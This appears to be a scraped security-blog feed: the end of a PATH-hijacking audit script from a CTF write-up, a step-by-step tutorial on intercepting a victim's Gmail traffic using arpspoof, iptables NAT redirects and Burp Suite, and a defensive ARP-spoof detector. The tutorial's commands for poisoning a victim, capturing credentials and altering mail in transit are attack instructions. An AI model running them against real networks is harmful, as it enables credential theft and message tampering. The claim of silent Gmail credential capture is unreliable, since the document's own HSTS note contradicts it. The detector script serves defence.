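        if d == "" or not d.startswith("/") or d in USER_WRITABLE:
            bad.append(d)
    return bad

SAFE_PATH = "/usr/local/bin:/usr/bin:/bin"
HIJACKED_PATH = "/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games"

if __name__ == "__main__":
    print(resolve("ps", SAFE_PATH), resolve("ps", HIJACKED_PATH))  # /bin/ps /tmp/ps
    print(resolve("/bin/ps", HIJACKED_PATH))  # /bin/ps: immune to PATH
    print(audit_path(HIJACKED_PATH))  # ['/tmp']
```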

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.

The post Hack the NullByte VM (CTF Challenge) appeared first on Hacking Articles.

Hijacking Gmail Message on Air using Burpsuite

Burp Suite supports various attacks that many people do not know about, so in this article we will try one of them. We will learn how to position ourselves between the victim and Gmail and change the text of a mail before it reaches the receiver.

First, open a terminal in Kali and type:

arpspoof -i wlan0 -t 192.168.100.4 192.168.100.1

Here,

-i –> interface

wlan0 –> network interface (this can be Ethernet or wireless depending on the network; if your victim is reached over eth0, use eth0 too)

-t –> target

192.168.100.4 –> victim IP

192.168.100.1 –> router (gateway) IP

This command makes the packets the victim sends to the router pass through us. Now open another terminal in Kali and run the reverse, so that the packets the router sends to the victim also pass through us:

arpspoof -i wlan0 -t 192.168.100.1 192.168.100.4

Here,

-i –> interface

wlan0 –> network interface

-t –> target

192.168.100.1 –> router (gateway) IP

192.168.100.4 –> victim IP

This command captures the packets sent from the router to the victim. Next, enable IP forwarding on our machine so that the intercepted traffic is passed on rather than dropped:

echo 1 > /proc/sys/net/ipv4/ip_forward

Then add a NAT rule so that all traffic to port 80 is redirected to our IP (192.168.100.5):

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.100.5

Do the same for port 443:

iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 192.168.100.5

After this, open Burp Suite, go to the Proxy tab, select the Options tab and click the Add button.

The following options appear. Enter 80 in the box adjacent to "Bind to port" and give your IP under "Specific address".

Then select the Request Handling tab, check "Support invisible proxy" and click OK.

Repeat the above steps for port 443 too.

After clicking OK, make sure the Running and Invisible boxes are checked for both listeners. Note that on port 443 Burp presents its own certificate: a browser that does not trust Burp's CA shows a certificate error instead of connecting silently, and for HSTS-preloaded domains such as google.com it offers no click-through at all, which is the user-visible signal defenders rely on.

When the victim signs in to their Gmail account, the request data is captured in Burp Suite.

This captured data contains the victim's username and password, as shown below.

Here is a closer view of the username and password.

The victim types and sends a message without suspecting anything:

But when the victim clicks the Send button, the mail comes to us before it reaches its destination.

Now you can change the text of the message with a simple left click on the message area and type your own message, as I changed HELLO THIS IS TESTING to YOU HAVE BEEN HACKED.

Once you have changed the message, click the Forward button at the top left and the mail continues to its destination, as shown below:
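The defender-side counterpart to the arpspoof commands above, added here as an example and not part of the article: it parses two snapshots of a host's ARP cache and flags the two signs of this poisoning, an IP whose MAC changes and two IPs sharing one MAC. The snapshots are constructed sample lines in `ip neigh show` format with made-up MAC addresses.

```python
"""ARP-cache spoof detector: added example, not part of the article.

arpspoof repeatedly sends forged ARP replies so that the victim maps the
gateway IP to the attacker's MAC (and the gateway maps the victim IP to
it). Two symptoms then appear in the ARP cache: an IP whose MAC changes,
and two IPs resolving to one MAC.
"""
import re

NEIGH_RE = re.compile(r"^(?P<ip>\d+(?:\.\d+){3}) dev \S+ lladdr (?P<mac>[0-9a-f:]{17})")

def parse_neigh(text):
    """Parse `ip neigh show` output into {ip: mac}; entries without an
    lladdr (FAILED/INCOMPLETE) are skipped."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m["ip"]] = m["mac"].lower()
    return table

def detect_spoof(before, after, gateway):
    """Compare two ARP-cache snapshots and return a list of alert strings."""
    alerts, by_mac = [], {}
    for ip, mac in after.items():
        old = before.get(ip)
        if old and old != mac:
            alerts.append(f"MAC change for {ip}: {old} -> {mac}")
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:  # one NIC answering for several IPs
            tag = " (includes gateway)" if gateway in ips else ""
            alerts.append(f"duplicate MAC {mac} for {sorted(ips)}{tag}")
    return alerts

# Constructed snapshots from the victim, before/after arpspoof ran from .5
BEFORE = """\
192.168.100.1 dev wlan0 lladdr aa:aa:aa:aa:aa:01 REACHABLE
192.168.100.5 dev wlan0 lladdr aa:aa:aa:aa:aa:05 STALE
192.168.100.9 dev wlan0  FAILED
"""
AFTER = """\
192.168.100.1 dev wlan0 lladdr aa:aa:aa:aa:aa:05 REACHABLE
192.168.100.5 dev wlan0 lladdr aa:aa:aa:aa:aa:05 STALE
"""

if __name__ == "__main__":
    for a in detect_spoof(parse_neigh(BEFORE), parse_neigh(AFTER), "192.168.100.1"):
        print("ALERT:", a)
```

On a real host the two snapshots would come from running `ip neigh show` periodically; a gateway entry that flips MAC between runs is the poisoning in progress.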

Shivam Gupta is an Ethical Hacker, Cyber Security Expert and Penetration Tester from India.

The post Hijacking Gmail Message on Air using Burpsuite appeared first on Hacking Articles.
